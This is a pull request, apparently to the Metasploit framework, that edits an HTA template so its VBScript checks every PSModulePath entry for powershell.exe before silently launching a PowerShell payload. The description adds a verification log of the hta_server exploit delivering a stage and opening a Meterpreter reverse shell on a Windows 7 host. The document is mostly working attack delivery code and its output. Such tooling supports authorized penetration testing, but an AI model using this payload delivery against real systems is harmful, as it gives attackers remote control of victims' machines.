### PR TITLE
Handle multiple entries in PSModulePath

### DIFF
--- a/data/templates/scripts/to_powershell.hta.template
+++ b/data/templates/scripts/to_powershell.hta.template
@@ -1,8 +1,11 @@
 <script language="VBScript">
   Set %{var_shell} = CreateObject("Wscript.Shell") 
   Set %{var_fso} = CreateObject("Scripting.FileSystemObject")
-  If %{var_fso}.FileExists(%{var_shell}.ExpandEnvironmentStrings("%%PSModulePath%%") + "..\powershell.exe") Then
-    %{var_shell}.Run "%{powershell}",0
-  End If
+  For each path in Split(%{var_shell}.ExpandEnvironmentStrings("%%PSModulePath%%"),";")
+    If %{var_fso}.FileExists(path + "\..\powershell.exe") Then
+      %{var_shell}.Run "%{powershell}",0 
+      Exit For
+    End If
+  Next
   window.close()
 </script>


### PR DESCRIPTION
This commit handles the case where more than one entry exists in
the PSModulePath environment variable. The updated code will loop
through each entry in the PSModulePath checking for the presence of
powershell.exe. When one is encountered it will execute the payload
and exit the for loop.

## Verification

- [x] Start `msfconsole`
- [x] `use exploit/windows/misc/hta_server` and verify you can get a session

```
msf exploit(handler) > use exploit/windows/misc/hta_server
msf exploit(hta_server) > exploit
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.18.230:4444 
msf exploit(hta_server) > [*] Using URL: http://0.0.0.0:80/HHlDRyhjXjoD.hta
[*] Local IP: http://192.168.18.230:80/HHlDRyhjXjoD.hta
[*] Server started.
[*] 192.168.18.55     hta_server - Delivering Payload
[*] 192.168.18.55     hta_server - Delivering Payload
[*] Sending stage (957487 bytes) to 192.168.18.55
[*] Meterpreter session 1 opened (192.168.18.230:4444 -> 192.168.18.55:50668) at 2017-04-19 11:53:32 -0400

msf exploit(hta_server) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer        : WIN-YPKLGCPOGE7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 
```


